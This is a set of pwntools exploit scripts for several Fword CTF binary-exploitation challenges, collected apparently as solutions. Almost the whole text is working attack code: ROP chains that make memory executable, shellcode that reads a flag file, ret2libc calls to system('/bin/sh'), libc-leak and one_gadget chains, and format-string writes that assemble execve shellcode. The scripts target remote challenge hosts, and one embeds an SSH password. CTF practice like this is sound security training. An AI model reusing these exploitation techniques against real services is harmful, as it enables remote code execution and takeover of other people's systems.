Fword CTF
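from pwn import *
context.arch = 'amd64'

# Two-stage exploit for ./blacklist (statically linked, so every address is fixed).
#   stage 1: ROP chain -> mprotect(.bss page, RWX) ; read(0, bss, 0x400) ; return into bss
#   stage 2: shellcode that openat()s /home/fbi, then the flag file inside it, and
#            sendfile()s it to stdout.  No execve() is attempted at all -- the
#            challenge name suggests a syscall blacklist (presumably seccomp; the
#            filter itself is not visible from this script, confirm against the binary).

# p = process('./blacklist')
p = remote('blacklist.fword.wtf', 1236)
e = ELF('./blacklist')

# Absolute addresses valid only for this exact build of ./blacklist.
mprotect = 0x448CF0
read = 0x447D30
bss_start = 0x4d2000      # page-aligned start of the region made RWX
bss = 0x4d2800            # where stage 2 is read to and then executed
pop_rdi_ret = 0x4017b6
pop_rsi_ret = 0x4024f6
pop_rdx_ret = 0x401db2

STAGE2_MAX = 0x400        # byte count the ROP chain hands to read()
STRINGS_OFF = 0x200       # shellcode is padded to this length; the path strings follow it

# Path strings appended after the shellcode.  Their addresses are derived from
# bss/STRINGS_OFF instead of being hard-coded a second time, so the shellcode's
# pointers and the string layout cannot drift apart.
dir_path = '/home/fbi\0'
file_name = 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacma.txt\0'
dir_addr = bss + STRINGS_OFF              # 0x4d2a00
file_addr = dir_addr + len(dir_path)      # 0x4d2a0a

# Stage 1: 0x40 bytes of padding, one qword (presumably the saved rbp), then the chain.
payload = 'a' * 0x40
payload += p64(0)
# mprotect(bss_start, 10000, 7).  10000 is not a page multiple; the kernel rounds
# the length up to whole pages, which covers bss .. bss + STAGE2_MAX.
payload += p64(pop_rdi_ret) + p64(bss_start)
payload += p64(pop_rsi_ret) + p64(10000)
payload += p64(pop_rdx_ret) + p64(7)
payload += p64(mprotect)
# read(0, bss, STAGE2_MAX): pull stage 2 from stdin into the now-RWX region.
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rsi_ret) + p64(bss)
payload += p64(pop_rdx_ret) + p64(STAGE2_MAX)
payload += p64(read)
# Return into the freshly read shellcode.
payload += p64(bss)
payload += p64(0)

# Stage 2.  fd numbers assume only stdin/stdout/stderr are open, so the two
# openat() calls yield fd 3 and fd 4 in that order.
shellcode = ''
shellcode += shellcraft.pushstr('')                # kept from the original; nothing below reads what it pushes
shellcode += shellcraft.mov('rdi', dir_addr)
shellcode += shellcraft.openat(0, 'rdi')          # absolute path, so the dirfd (0) is ignored -> fd 3
shellcode += shellcraft.mov('rdi', file_addr)
shellcode += shellcraft.openat(3, 'rdi')          # relative to the directory fd -> fd 4
shellcode += shellcraft.sendfile(1, 4, 0, 1000)   # copy up to 1000 bytes of the file straight to stdout
shellcode_asm = asm(shellcode)

# str.ljust() never truncates: if the shellcode ever grows past STRINGS_OFF the
# strings would silently shift away from the addresses baked into it.
if len(shellcode_asm) > STRINGS_OFF:
    raise ValueError('shellcode is %d bytes, exceeds the 0x%x bytes reserved for it'
                     % (len(shellcode_asm), STRINGS_OFF))
stage2 = shellcode_asm.ljust(STRINGS_OFF)
stage2 += dir_path
stage2 += file_name
# The chain's read() takes at most STAGE2_MAX bytes; anything beyond would be
# cut off without any error.
if len(stage2) > STAGE2_MAX:
    raise ValueError('stage 2 is %d bytes, read() only accepts 0x%x'
                     % (len(stage2), STAGE2_MAX))

pause()
p.sendline(payload)
p.send(stage2)
p.interactive()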
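from pwn import *
import os

# The task runs on a remote box reached over SSH.  The inline value is the
# credential handed out with the challenge (it is already public in this gist),
# but keep it out of the script where possible: set SUPEREZ_SSH_PASSWORD to
# override it so the file can be shared/committed without a password inline.
SSH_PASSWORD = os.environ.get('SUPEREZ_SSH_PASSWORD', 'FwOrDAndKahl4FTW')

s = ssh(user='ctf', host='superez.fword.wtf', port=2222, password=SSH_PASSWORD)
p = s.run("/bin/bash")
p.sendlineafter('$', './task')
e = ELF('./superez_patched')
# p = process('./superez_patched', shell=True)
# e = ELF('./superez_patched')

# 0xa8 bytes of NUL padding before the overwritten 8-byte value; 0x400918 is
# the address returned to.  0x400917 is the alternative that was tried and
# kept for reference (the byte before it).
payload = '\0' * 0xa8
# payload += p64(0x400917)
payload += p64(0x400918)
p.sendlineafter('continue:', payload)
p.interactive()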
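from pwn import *

# 32-bit ret2libc for ./molotov: the service leaks system()'s address on its
# first line, which pins the libc base for the supplied libc build.
p = remote('54.210.217.206', 1240)
e = ELF('./molotov')
libc = ELF('./libc6_2.30-0ubuntu2.2_i386.so')

system = int(p.recvline(), 16)
libc_base = system - libc.symbols['system']
# A wrong libc build (different system() offset) shows up as a non-page-aligned
# base; fail here rather than after a payload has been sent.
if libc_base & 0xfff:
    raise ValueError('libc_base 0x%x is not page-aligned -- wrong libc build?' % libc_base)

# next() instead of .next() so the same line works on Python 2 and 3.
binsh_off = next(libc.search('/bin/sh\0'))
binsh = libc_base + binsh_off
info(hex(binsh_off))
# Gadget addresses named pop;ret / pop;pop;pop;ret in the original.  They are
# only logged; the chain below does not use them.
pr = libc_base + 0xd639e
pppr = libc_base + 0xd639c
info('system: ' + hex(system))
info('binsh: ' + hex(binsh))
info('libc_base: ' + hex(libc_base))
info('pr: ' + hex(pr))
info('pppr: ' + hex(pppr))

# 0x1c bytes of padding, one dword (presumably the saved ebp), then the
# classic system(<ret>, "/bin/sh") frame.
payload = 'a' * 0x1c
payload += p32(0)
payload += p32(system)   # overwritten return address
payload += p32(0)        # return address for system() itself
payload += p32(binsh)    # first argument of system()
payload += p32(0) * 3    # trailing filler, not consumed by the call
p.sendlineafter(':', payload)
p.interactive()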
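from pwn import *
# p = process('./numbers')
p = remote('numbers.fword.wtf', 1237)
e = ELF('./numbers')

# Leak round: answer -1, then exactly 8 non-NUL bytes so that the line echoed
# back continues into the adjacent pointer (presumably a missing terminator --
# confirm against the binary).  The pointer is the 6 significant bytes that
# follow the 8 'a's; pad it to a full qword.
p.sendafter('??', '-1')
p.sendafter('??', 'a' * 8)
p.recvline()
leak_line = p.recvline()
libc_leak = u64(leak_line[8:8 + 6] + '\0\0')
libc_base = libc_leak - 0x42480        # offset of the leaked pointer in the remote libc
# Wrong offset or wrong libc shows up as an unaligned base; stop before sending.
if libc_base & 0xfff:
    raise ValueError('libc_base 0x%x is not page-aligned -- wrong leak offset or libc?' % libc_base)
# one_gadget candidates for this libc: 328070 328163 1064784 (first one works here).
one_gadget = libc_base + 328070
info('libc_leak: ' + hex(libc_leak))
info('libc_base: ' + hex(libc_base))
info('one_gadget: ' + hex(one_gadget))

# Exploit round: 0x40 bytes of padding, one qword (presumably the saved rbp),
# then the one_gadget as return address.
payload = 'a' * 0x40
payload += p64(0)
payload += p64(one_gadget)
pause()
p.sendline()
p.sendafter('??', '-1')
p.sendafter('??', payload)
p.interactive()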
from pwn import *
# p = process('./one_piece_remake')
p = remote('onepiece.fword.wtf', 1236)
e = ELF('./one_piece_remake')

# i386 execve("//bin/sh", 0, 0) shellcode: xor eax; push 0; push "n/sh"; push "//bi";
# mov ebx, esp; xor ecx; xor edx; mov al, 8; inc eax x3 (-> 11 = execve); int 0x80.
shellcode = ("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
             "\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80")
WRITE_BASE = 0x804A038   # where the shellcode is assembled in the target
CHUNK = 4                # bytes written per format-string round

# One round per chunk: 'gomugomunomi' presumably unlocks the format-string
# input (confirm against the binary); fmtstr_payload then writes the chunk
# at WRITE_BASE + offset via format argument 7.  The last chunk may be shorter.
offsets = range(0, len(shellcode), CHUNK)
chunks = [shellcode[off:off + CHUNK] for off in offsets]
for off, chunk in zip(offsets, chunks):
    p.sendlineafter('>>', 'gomugomunomi')
    p.sendafter('>>', fmtstr_payload(7, {WRITE_BASE + off: chunk}))
# With the shellcode fully in place, 'run' hands control to it.
p.sendlineafter('>>', 'run')
p.interactive()
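from pwn import *
# p = process('./one_piece')
p = remote('onepiece.fword.wtf', 1238)
e = ELF('./one_piece')
libc = ELF('./libc6_2.30-0ubuntu2.1_amd64.so')
# libc = ELF('./libc-2.23.so')


def _check_page_aligned(label, base):
    """Abort before anything is sent when a derived base is not page-aligned.

    An unaligned PIE or libc base means the leak offset or the libc build is
    wrong; continuing would only send a ROP chain to bogus addresses.
    """
    if base & 0xfff:
        raise ValueError('%s 0x%x is not page-aligned -- wrong offset or wrong build?' % (label, base))


# Stage 0: 'read' + a 40-byte name, then 'gomugomunomi' prints a line of the
# form "...: 0x<addr>" from which the binary's load address is recovered.
p.sendlineafter('>>', 'read')
p.sendafter(':', 'a' + 'z' * 38 + 'z')
p.sendlineafter('>>', 'gomugomunomi')
pie_leak = int(p.recvline().split(':')[1], 16)
pie_base = pie_leak - 0xa3a          # offset of the leaked address inside the binary
_check_page_aligned('pie_base', pie_base)
read_got = pie_base + e.got['read']
puts_got = pie_base + e.got['puts']
puts_plt = pie_base + e.plt['puts']
ret = pie_base + 0x70e               # logged only
pop_rdi_ret = pie_base + 0xba3
main_start = pie_base + 0xA3F        # re-enter main so the overflow can be hit a second time
info('pie_leak: ' + hex(pie_leak))
info('pie_base: ' + hex(pie_base))
info('puts_got: ' + hex(puts_got))
info('read_got: ' + hex(read_got))
info('ret: ' + hex(ret))
info('pop_rdi_ret: ' + hex(pop_rdi_ret))
pause()

# Stage 1: 0x30 bytes of padding, one qword (presumably the saved rbp), then
# puts(puts@got) to leak libc, and return into main.
payload = 'z' * 0x30 + p64(0)
payload += p64(pop_rdi_ret)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main_start)
p.sendlineafter(':', payload)
p.recvline()
# puts() prints the 6 significant bytes of the address followed by '\n';
# ljust() pads to a qword and also tolerates a shorter line (a high NUL byte).
puts = u64(p.recvline().rstrip('\n').ljust(8, '\0'))
libc_base = puts - libc.symbols['puts']
_check_page_aligned('libc_base', libc_base)
system = libc_base + libc.symbols['system']
# one_gadget candidates for libc6_2.30-0ubuntu2.1: 945043 945046 945049 1093545.
# The set 283158 283242 983716 987463 is presumably for the commented-out libc-2.23.
one_gadget_offset = 1093545
one_gadget = libc_base + one_gadget_offset
info('puts: ' + hex(puts))
info('libc_base: ' + hex(libc_base))
info('system: ' + hex(system))
info('one_gadget: ' + hex(one_gadget))

# Stage 2: same overflow again, this time returning straight into the one_gadget.
payload = 'z' * 0x30 + p64(0)
payload += p64(one_gadget)
p.sendlineafter('>>', 'read')
p.sendafter(':', 'a' + 'z' * 38 + 'z')
p.sendlineafter('>>', 'gomugomunomi')
p.recvline()
p.sendlineafter(':', payload)
p.interactive()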